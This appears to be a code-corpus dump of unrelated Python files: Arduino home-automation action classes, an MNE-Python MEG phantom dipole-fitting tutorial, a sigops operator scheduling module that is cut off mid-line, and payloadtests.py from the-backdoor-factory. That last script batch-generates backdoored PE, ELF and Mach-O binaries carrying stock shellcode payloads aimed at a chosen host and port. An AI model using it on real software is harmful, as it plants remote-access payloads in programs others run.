get_payload(self) -> str: pass class ImmediatelyActionTrigger(ActionTrigger): def __init__(self) -> None: super(ImmediatelyActionTrigger, self).__init__(ActionTriggerType.IMMEDIATELY) class AfterReleaseActionTrigger(ActionTrigger): def __init__(self) -> None: super(AfterReleaseActionTrigger, self).__init__(ActionTriggerType.AFTER_RELEASE) class LongDownActionTrigger(ActionTrigger): def __init__(self, seconds_down: int): super(LongDownActionTrigger, self).__init__(ActionTriggerType.LONG_DOWN) self._seconds_down = seconds_down @property def seconds_down(self) -> int: return self._seconds_down class Pin(ABC): """Represents a pin on an arduino""" def __init__(self, number: int, pin_type: ArduinoPinType, state=False): self.number = number self.pin_type = pin_type self.state = state class OutputPin(Pin): """Represents a single pin on an arduino""" def __init__(self, number: int, parent: str, state=False): """ Creates a new output pin :param number: number of this pin on the given arduino :param parent: name of the arduino :param state: Initial state """ super(OutputPin, self).__init__(number, ArduinoPinType.OUTPUT, state) self.parent = parent class IndividualAction: """Represents the actions on pins that have to happen on a single arduino""" def __init__(self, delay: int, pin_numbers_on: List[int], pin_numbers_off: List[int]): self.delay = delay self.pin_numbers_on = pin_numbers_on self.pin_numbers_off = pin_numbers_off def add_pin_on(self, pin_number: int): self.pin_numbers_on.append(pin_number) def add_pin_off(self, pin_number: int): self.pin_numbers_off.append(pin_number) def has_values_on(self) -> bool: if len(self.pin_numbers_on) > 0: return True return False def has_values_off(self) -> bool: if len(self.pin_numbers_off) > 0: return True return False class IndividualDimAction: """Represents a dimmer action for a single arduino""" def __init__(self, dim_speed: int, dim_light_value: int, delay: int, cancel_on_button_release: bool): self.__speed = dim_speed self.__dim_light_value = dim_light_value self.__delay = delay self.__pin_numbers = [] self.__cancel_on_button_release = cancel_on_button_release def add_pin(self, pin_number: int): self.__pin_numbers.append(pin_number) def has_values(self) -> bool: if len(self.__pin_numbers) > 0: return True return False @property def speed(self) -> int: return self.__speed @property def dim_light_value(self) -> int: """The value the pins should go to""" return self.__dim_light_value @property def delay(self) -> int: return self.__delay @property def pin_numbers(self) -> List[int]: return self.__pin_numbers @property def cancel_on_button_release(self) -> bool: return self.__cancel_on_button_release class Action(ABC): """Represents a single action""" def __init__(self, trigger: ActionTrigger, action_type: ActionType, delay: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.trigger = trigger self.action_type = action_type self.delay = delay self.output_pins = output_pins self.notifications = notifications self.condition = condition self.click_number = click_number def get_condition(self) -> Condition: return self.condition class DimmerAction(Action): """Represents a single dimmer action""" def __init__(self, trigger: ActionTrigger, action_type: ActionType, delay: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, cancel_on_button_release: bool): super(DimmerAction, self).__init__(trigger, action_type, delay, output_pins, notifications, condition, click_number) self._dimmer_speed = dimmer_speed self._cancel_on_button_release = cancel_on_button_release @property def cancel_on_button_release(self) -> bool: return self._cancel_on_button_release class ButtonPin(Pin): """Represents a single input pin on an arduino""" def __init__(self, number: int, actions: List[Action], time_between_clicks, state=False): self.__actions = actions self.__long_down_timer = None self.__multi_click_timer = None self.__longdown_executed = False self.__time_between_clicks = time_between_clicks self.__clicks = 0 self.__dimmer_direction = True super(ButtonPin, self).__init__(number, ArduinoPinType.BUTTON, state) def get_button_immediate_actions(self) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.IMMEDIATELY and self.clicks == action.click_number: results.append(action) return results def get_button_after_release_actions(self) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.AFTER_RELEASE and self.clicks == action.click_number: results.append(action) return results def get_smallest_longdown_time(self, minimum_time: int) -> Optional[int]: longdown_time = None for action in self.actions: if action.click_number == self.clicks and action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \ isinstance(action.trigger, LongDownActionTrigger): if longdown_time is None and action.trigger.seconds_down > minimum_time: longdown_time = action.trigger.seconds_down elif action.trigger.seconds_down > minimum_time: longdown_time = action.trigger.seconds_down return longdown_time def get_button_long_down_actions(self, seconds_down: int) -> List[Action]: results = [] for action in self.actions: if action.trigger.trigger_type == ActionTriggerType.LONG_DOWN and \ action.trigger.seconds_down == seconds_down and isinstance(action.trigger, LongDownActionTrigger): results.append(action) return results def has_cancellable_dimmer_actions(self) -> bool: for action in self.actions: if isinstance(action, DimmerAction) and action.cancel_on_button_release: return True return False def has_multi_click_actions(self, minimum_click: int) -> bool: for action in self.actions: if minimum_click <= action.click_number > 1: return True return False def start_long_down_timer(self, interval: int, function, args: List[object]): logger.debug(f"Start long down timer") self.__long_down_timer = Timer(interval, function, args=(args,)) self.__long_down_timer.start() def stop_long_down_timer(self) -> None: logger.debug(f"Stop long down timer") self.__long_down_timer.cancel() self.__long_down_timer = None def start_multi_click_timer(self, interval: int, function, args: List[object]): logger.debug(f"Start multi click timer") self.__multi_click_timer = Timer(interval, function, args=(args,)) self.__multi_click_timer.start() def stop_multi_click_timer(self) -> None: logger.debug(f"Stop multi click timer") self.__multi_click_timer.cancel() self.__multi_click_timer = None def reverse_dimmer_direction(self) -> None: self.__dimmer_direction = not self.dimmer_direction @property def multi_click_timer(self) -> Timer: return self.__multi_click_timer @property def dimmer_direction(self) -> bool: return self.__dimmer_direction @dimmer_direction.setter def dimmer_direction(self, dimmer_direction: bool): self.__dimmer_direction = dimmer_direction @property def time_between_clicks(self) -> float: return self.__time_between_clicks @property def long_down_timer(self) -> Timer: return self.__long_down_timer @long_down_timer.setter def long_down_timer(self, long_down_timer: Timer): self.__long_down_timer = long_down_timer @property def clicks(self) -> int: return self.__clicks @clicks.setter def clicks(self, clicks: int): self.__clicks = clicks @property def actions(self) -> List[Action]: return self.__actions @property def longdown_executed(self) -> bool: return self.__longdown_executed @longdown_executed.setter def longdown_executed(self, longdown_executed: bool): self.__longdown_executed = longdown_executed class Arduino: """Represents an actual arduino""" def __init__(self, name: str, number_of_outputs_pins: int, number_of_button_pins: int): self.name = name self.number_of_output_pins = number_of_outputs_pins self.number_of_button_pins = number_of_button_pins self.__output_pins = dict() self._button_pins = dict() @property def button_pins(self) -> Dict[int, ButtonPin]: return self._button_pins @property def output_pins(self) -> Dict[int, OutputPin]: return self.__output_pins def set_output_pin(self, output_pin: OutputPin): self.output_pins[output_pin.number] = output_pin def set_output_pins(self, output_pins: List[OutputPin]): for pin in output_pins: self.output_pins[pin.number] = pin def set_button_pin(self, button_pin: ButtonPin): self._button_pins[button_pin.number] = button_pin def set_button_pins(self, button_pins: List[ButtonPin]): for pin in button_pins: self._button_pins[pin.number] = pin def get_output_pin(self, pin_number: int) -> OutputPin: return self.output_pins[pin_number] def get_changed_pins(self, payload: str) -> Dict[int, bool]: status = util.convert_hex_to_array(payload, self.number_of_output_pins) changed_pins = dict() for pin in self._button_pins.values(): if bool(int(status[pin.number])) != pin.state: changed_pins[pin.number] = bool(int(status[pin.number])) pin.state = bool(int(status[pin.number])) return changed_pins class IndividualRealTimeDimAction(IndividualAction): """Represents a dimmer action for a single arduino""" def __init__(self, dim_speed: int, dim_light_value: int, delay: int, pin_numbers_on: List[int], pin_numbers_off: List[int], arduino: Arduino, button: ButtonPin): super(IndividualAction).__init__(delay, pin_numbers_on, pin_numbers_off) self.speed = dim_speed self.dim_light_value = dim_light_value self.arduino = arduino self.button = button class MailNotification(Notification): def __init__(self, message: str, subject: str, mails: List[str], enabled=False): super(MailNotification, self).__init__(message, enabled) self.mails = mails self.subject = subject def get_topic_name(self) -> str: return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.mailTopic def get_payload(self) -> str: return util.serialize_json( { "mails": self.mails, "message": self.message, "subject": self.subject }) class TelegramNotification(Notification): def __init__(self, message: str, tokens: List[str], enabled=False): super(TelegramNotification, self).__init__(message, enabled) self.tokens = tokens def get_topic_name(self) -> str: return constants.iRulezTopic + "/" + constants.notificationTopic + "/" + constants.telegramTopic def get_payload(self) -> str: return util.serialize_json( { "tokens": self.tokens, "message": self.message }) class ConditionList(Condition): def __init__(self, operator: Operator, conditions: List[Condition]): super(ConditionList, self).__init__(ConditionType.LIST) self.operator = operator self.conditions = conditions class OutputPinCondition(Condition): def __init__(self, output_pin: OutputPin, status: bool): super(OutputPinCondition, self).__init__(ConditionType.OUTPUT_PIN) self.output_pin = output_pin self.status = status class TimeCondition(Condition): def __init__(self, from_time: time, to_time: time): super(TimeCondition, self).__init__(ConditionType.TIME) self.from_time = from_time self.to_time = to_time class OnAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, off_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.off_timer = off_timer super(OnAction, self).__init__(trigger, ActionType.ON, delay, output_pins, notifications, condition, click_number) def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) if self.off_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.off_timer, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class OffAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, on_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int): self.on_timer = on_timer super(OffAction, self).__init__(trigger, ActionType.OFF, delay, output_pins, notifications, condition, click_number) def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) if self.on_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.on_timer, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class ToggleAction(Action): def __init__(self, trigger: ActionTrigger, delay: int, output_pins: List[OutputPin], notifications: List[Notification], master: OutputPin, condition: Optional[Condition], click_number: int): super(ToggleAction, self).__init__(trigger, ActionType.TOGGLE, delay, output_pins, notifications, condition, click_number) self.master = master def perform_action(self, pins_to_switch: Dict[str, List[IndividualAction]], master: bool): # if master is on put all the lights of and visa versa temp_pin_actions = {} if master: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_off(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_off(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_off(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) else: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualAction(self.delay, [], []) pin_action.add_pin_on(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin_on(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values_on(): pins_to_switch.setdefault(key, []).append(temp_pin_actions[key]) class OnDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, off_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, dimmer_light_value: int, cancel_on_button_release: bool, master_dim_id: int): self.__off_timer = off_timer self.__dimmer_light_value = dimmer_light_value self.__master_dim_id = master_dim_id super(OnDimmerAction, self).__init__(trigger, ActionType.ON_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: if self.__dimmer_light_value is None: self.__dimmer_light_value = 100 pin_action = IndividualDimAction(self._dimmer_speed, self.__dimmer_light_value, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) if self.__off_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__off_timer, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class OffDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, on_timer: int, output_pins: List[OutputPin], notifications: List[Notification], condition: Optional[Condition], click_number: int, dimmer_speed: int, cancel_on_button_release: bool): self.__on_timer = on_timer super(OffDimmerAction, self).__init__(trigger, ActionType.OFF_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]]): temp_pin_actions = {} for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) if self.__on_timer > 0: for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.__on_timer, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class ToggleDimmerAction(DimmerAction): def __init__(self, trigger: ActionTrigger, delay: int, output_pins: List[OutputPin], notifications: List[Notification], master: OutputPin, condition: Optional[Condition], click_number: int, dimmer_speed: int, dimmer_light_value: int, cancel_on_button_release: bool, master_dim_id: Optional[int]): super(ToggleDimmerAction, self).__init__(trigger, ActionType.TOGGLE_DIMMER, delay, output_pins, notifications, condition, click_number, dimmer_speed, cancel_on_button_release) self.master = master self.__dimmer_light_value = dimmer_light_value self.__master_dim_id = master_dim_id @property def master_dim_id(self) -> Optional[int]: return self.__master_dim_id def perform_action(self, pin_to_dim: Dict[str, List[IndividualDimAction]], last_light_values_to_update: Dict[int, int], master_state: int, master_direction: str, last_light_value: int): temp_pin_actions = {} # If master is off, start turning all lights on, regardless of button pressed or button longdown # If cancel_on_button_release is set to true and last dim direction was down, we start dimming up # If master_state is 100, start turning all lights off logger.debug(f"{master_state}, {self.cancel_on_button_release}, {master_direction}") if master_state == 0 or \ (self.cancel_on_button_release and master_direction == constants.dim_direction_down and master_state != 100): # If __dimmer_light_value is configured, use that value. Otherwise use the last known value light_value_to_set = self.__dimmer_light_value if light_value_to_set == -1: light_value_to_set = last_light_value logger.debug(f"{light_value_to_set}") # Generate dim actions for each impacted pin for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, light_value_to_set, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) # If master is on and cancel_on_button_release is false or last dim direction was up, we start dimming down else: if not self.cancel_on_button_release: last_light_values_to_update.setdefault(self.master_dim_id, master_state) for pin in self.output_pins: if pin.parent not in temp_pin_actions: pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release) pin_action.add_pin(pin.number) temp_pin_actions[pin.parent] = pin_action else: temp_pin_actions[pin.parent].add_pin(pin.number) for key in temp_pin_actions: if temp_pin_actions[key].has_values(): pin_to_dim.setdefault(key, []).append(temp_pin_actions[key]) class ArduinoConfig: """Represents the configuration of all known arduinos""" def __init__(self, arduinos: List[Arduino]): self.arduinos = arduinos
mit
wmvanvliet/mne-python
tutorials/sample-datasets/plot_brainstorm_phantom_elekta.py
10
6588
# -*- coding: utf-8 -*- """ .. _tut-brainstorm-elekta-phantom: ========================================== Brainstorm Elekta phantom dataset tutorial ========================================== Here we compute the evoked from raw for the Brainstorm Elekta phantom tutorial dataset. For comparison, see :footcite:`TadelEtAl2011` and: https://neuroimage.usc.edu/brainstorm/Tutorials/PhantomElekta References ---------- .. footbibliography:: """ # sphinx_gallery_thumbnail_number = 9 # Authors: Eric Larson <[email protected]> # # License: BSD (3-clause) import os.path as op import numpy as np import matplotlib.pyplot as plt import mne from mne import find_events, fit_dipole from mne.datasets.brainstorm import bst_phantom_elekta from mne.io import read_raw_fif print(__doc__) ############################################################################### # The data were collected with an Elekta Neuromag VectorView system at 1000 Hz # and low-pass filtered at 330 Hz. Here the medium-amplitude (200 nAm) data # are read to construct instances of :class:`mne.io.Raw`. data_path = bst_phantom_elekta.data_path(verbose=True) subject = 'sample' raw_fname = op.join(data_path, 'kojak_all_200nAm_pp_no_chpi_no_ms_raw.fif') raw = read_raw_fif(raw_fname) ############################################################################### # Data channel array consisted of 204 MEG planor gradiometers, # 102 axial magnetometers, and 3 stimulus channels. Let's get the events # for the phantom, where each dipole (1-32) gets its own event: events = find_events(raw, 'STI201') raw.plot(events=events) raw.info['bads'] = ['MEG1933', 'MEG2421'] ############################################################################### # The data have strong line frequency (60 Hz and harmonics) and cHPI coil # noise (five peaks around 300 Hz). Here we plot only out to 60 seconds # to save memory: raw.plot_psd(tmax=30., average=False) ############################################################################### # Our phantom produces sinusoidal bursts at 20 Hz: raw.plot(events=events) ############################################################################### # Now we epoch our data, average it, and look at the first dipole response. # The first peak appears around 3 ms. Because we low-passed at 40 Hz, # we can also decimate our data to save memory. tmin, tmax = -0.1, 0.1 bmax = -0.05 # Avoid capture filter ringing into baseline event_id = list(range(1, 33)) epochs = mne.Epochs(raw, events, event_id, tmin, tmax, baseline=(None, bmax), preload=False) epochs['1'].average().plot(time_unit='s') ############################################################################### # .. _plt_brainstorm_phantom_elekta_eeg_sphere_geometry: # # Let's use a :ref:`sphere head geometry model <eeg_sphere_model>` # and let's see the coordinate alignment and the sphere location. The phantom # is properly modeled by a single-shell sphere with origin (0., 0., 0.). sphere = mne.make_sphere_model(r0=(0., 0., 0.), head_radius=0.08) mne.viz.plot_alignment(epochs.info, subject=subject, show_axes=True, bem=sphere, dig=True, surfaces='head') ############################################################################### # Let's do some dipole fits. We first compute the noise covariance, # then do the fits for each event_id taking the time instant that maximizes # the global field power. # here we can get away with using method='oas' for speed (faster than "shrunk") # but in general "shrunk" is usually better cov = mne.compute_covariance(epochs, tmax=bmax) mne.viz.plot_evoked_white(epochs['1'].average(), cov) data = [] t_peak = 0.036 # true for Elekta phantom for ii in event_id: # Avoid the first and last trials -- can contain dipole-switching artifacts evoked = epochs[str(ii)][1:-1].average().crop(t_peak, t_peak) data.append(evoked.data[:, 0]) evoked = mne.EvokedArray(np.array(data).T, evoked.info, tmin=0.) del epochs dip, residual = fit_dipole(evoked, cov, sphere, n_jobs=1) ############################################################################### # Do a quick visualization of how much variance we explained, putting the # data and residuals on the same scale (here the "time points" are the # 32 dipole peak values that we fit): fig, axes = plt.subplots(2, 1) evoked.plot(axes=axes) for ax in axes: ax.texts = [] for line in ax.lines: line.set_color('#98df81') residual.plot(axes=axes) ############################################################################### # Now we can compare to the actual locations, taking the difference in mm: actual_pos, actual_ori = mne.dipole.get_phantom_dipoles() actual_amp = 100. # nAm fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, ncols=1, figsize=(6, 7)) diffs = 1000 * np.sqrt(np.sum((dip.pos - actual_pos) ** 2, axis=-1)) print('mean(position error) = %0.1f mm' % (np.mean(diffs),)) ax1.bar(event_id, diffs) ax1.set_xlabel('Dipole index') ax1.set_ylabel('Loc. error (mm)') angles = np.rad2deg(np.arccos(np.abs(np.sum(dip.ori * actual_ori, axis=1)))) print(u'mean(angle error) = %0.1f°' % (np.mean(angles),)) ax2.bar(event_id, angles) ax2.set_xlabel('Dipole index') ax2.set_ylabel(u'Angle error (°)') amps = actual_amp - dip.amplitude / 1e-9 print('mean(abs amplitude error) = %0.1f nAm' % (np.mean(np.abs(amps)),)) ax3.bar(event_id, amps) ax3.set_xlabel('Dipole index') ax3.set_ylabel('Amplitude error (nAm)') fig.tight_layout() plt.show() ############################################################################### # Let's plot the positions and the orientations of the actual and the estimated # dipoles actual_amp = np.ones(len(dip)) # misc amp to create Dipole instance actual_gof = np.ones(len(dip)) # misc GOF to create Dipole instance dip_true = \ mne.Dipole(dip.times, actual_pos, actual_amp, actual_ori, actual_gof) fig = mne.viz.plot_alignment(evoked.info, bem=sphere, surfaces='inner_skull', coord_frame='head', meg='helmet', show_axes=True) # Plot the position and the orientation of the actual dipole fig = mne.viz.plot_dipole_locations(dipoles=dip_true, mode='arrow', subject=subject, color=(0., 0., 0.), fig=fig) # Plot the position and the orientation of the estimated dipole fig = mne.viz.plot_dipole_locations(dipoles=dip, mode='arrow', subject=subject, color=(0.2, 1., 0.5), fig=fig) mne.viz.set_3d_view(figure=fig, azimuth=70, elevation=80, distance=0.5)
bsd-3-clause
uvbs/the-backdoor-factory
payloadtests.py
13
6022
#!/usr/bin/env python ''' Copyright (c) 2013-2015, Joshua Pitts All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import pebin import machobin import elfbin import sys import os def basicDiscovery(FILE): macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe', '\xce\xfa\xed\xfe', ] testBinary = open(FILE, 'rb') header = testBinary.read(4) testBinary.close() if 'MZ' in header: return 'PE' elif 'ELF' in header: return 'ELF' elif header in macho_supported: return "MACHO" else: 'Only support ELF, PE, and MACH-O file formats' return None if __name__ == "__main__": ''' Will create patched binaries for each payload for the type of binary provided. Each payload has it's own port number. Usage: ./payloadtests.py file 127.0.0.1 8080 ''' if len(sys.argv) != 4: print "Will create patched binaries for each stock shellcode/payload for the " print "type of binary provided. Each payload type has it's own port number." print "Usage:" + str(sys.argv[0]) + " binary HOST PORT" sys.exit() file = sys.argv[1] host = sys.argv[2] port = int(sys.argv[3]) outputfiles = {} is_supported = basicDiscovery(file) if is_supported is "PE": patchtypes = ['APPEND', 'JUMP', 'SINGLE'] supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() #print supported_file.flItms['avail_shells'] for aShell in supported_file.flItms['avail_shells']: for patchtype in patchtypes: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName if patchtype == 'APPEND': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, ADD_SECTION=True) elif patchtype == 'JUMP': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, CAVE_JUMPING=True) elif patchtype == 'SINGLE': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, CAVE_JUMPING=False) result = supported_file.run_this() outputfiles[aName] = result port += 1 elif is_supported is "ELF": supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() for aShell in supported_file.avail_shells: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port) result = supported_file.run_this() outputfiles[aName] = result port += 1 elif is_supported is "MACHO": supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() for aShell in supported_file.avail_shells: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName supported_file = machobin.machobin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, FAT_PRIORITY='ALL') result = supported_file.run_this() outputfiles[aName] = result port += 1 print "Successful files are in backdoored:" for afile, aresult in outputfiles.iteritems(): if aresult is True: print afile, 'Success' else: print afile, 'Fail' os.remove('backdoored/' + afile)
bsd-3-clause
jaberg/sigops
sigops/operator.py
1
6049
import numpy as np import itertools from collections import defaultdict import numpy as np import networkx as nx def is_op(thing): try: return thing._is_sigops_operator except AttributeError: return False class Operator(object): """Base class for operator instances understood by nengo.Simulator. The lifetime of a Signal during one simulator timestep: 0) at most one set operator (optional) 1) any number of increments 2) any number of reads 3) at most one update A signal that is only read can be considered a "constant". A signal that is both set *and* updated can be a problem: since reads must come after the set, and the set will destroy whatever were the contents of the update, it can be the case that the update is completely hidden and rendered irrelevant. There are however at least two reasons to use both a set and an update: (a) to use a signal as scratch space (updating means destroying it) (b) to use sets and updates on partly overlapping views of the same memory. N.B.: It is done on purpose that there are no default values for reads, sets, incs, and updates. Each operator should explicitly set each of these properties. """ _is_sigops_operator = True @property def reads(self): """Signals that are read and not modified""" return self._reads @reads.setter def reads(self, val): self._reads = val @property def sets(self): """Signals assigned by this operator A signal that is set here cannot be set or updated by any other operator. """ return self._sets @sets.setter def sets(self, val): self._sets = val @property def incs(self): """Signals incremented by this operator Increments will be applied after this signal has been set (if it is set), and before reads. """ return self._incs @incs.setter def incs(self, val): self._incs = val @property def updates(self): """Signals assigned their value for time t + 1 This operator will be scheduled so that updates appear after all sets, increments and reads of this signal. """ return self._updates @updates.setter def updates(self, val): self._updates = val @property def all_signals(self): return self.reads + self.sets + self.incs + self.updates def init_signals(self, signals): """ Install any buffers into the signals view that this operator will need. Classes for nonlinearities that use extra buffers should create them here. """ for sig in self.all_signals: if sig.base not in signals: signals[sig.base] = np.asarray( np.zeros(sig.base.shape, dtype=sig.base.dtype) + sig.base.value) def depgraph(operators, verbose=False): dg = nx.DiGraph() for op in operators: dg.add_edges_from(itertools.product(op.reads + op.updates, [op])) dg.add_edges_from(itertools.product([op], op.sets + op.incs)) # -- all views of a base object in a particular dictionary by_base_writes = defaultdict(list) by_base_reads = defaultdict(list) reads = defaultdict(list) sets = defaultdict(list) incs = defaultdict(list) ups = defaultdict(list) for op in operators: for node in op.sets + op.incs: by_base_writes[node.base].append(node) for node in op.reads: by_base_reads[node.base].append(node) for node in op.reads: reads[node].append(op) for node in op.sets: sets[node].append(op) for node in op.incs: incs[node].append(op) for node in op.updates: ups[node].append(op) # -- assert that only one op sets any particular view for node in sets: assert len(sets[node]) == 1, (node, sets[node]) # -- assert that only one op updates any particular view for node in ups: assert len(ups[node]) == 1, (node, ups[node]) # --- assert that any node that is incremented is also set/updated for node in incs: assert len(sets[node] + ups[node]) > 0, (node) # -- assert that no two views are both set and aliased if len(sets) >= 2: for node, other in itertools.combinations(sets, 2): assert not node.shares_memory_with(other), \ ("%s shares memory with %s" % (node, other)) # -- assert that no two views are both updated and aliased if len(ups) >= 2: for node, other in itertools.combinations(ups, 2): assert not node.shares_memory_with(other), (node, other) # -- Scheduling algorithm for serial evaluation: # 1) All sets on a given base signal # 2) All incs on a given base signal # 3) All reads on a given base signal # 4) All updates on a given base signal # -- incs depend on sets for node, post_ops in incs.items(): pre_ops = list(sets[node]) for other in by_base_writes[node.base]: pre_ops += sets[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) # -- reads depend on writes (sets and incs) for node, post_ops in reads.items(): pre_ops = sets[node] + incs[node] for other in by_base_writes[node.base]: pre_ops += sets[other] + incs[other] dg.add_edges_from(itertools.product(set(pre_ops), post_ops)) # -- updates depend on reads, sets, and incs. for node, post_ops in ups.items(): pre_ops = sets[node] + incs[node] + 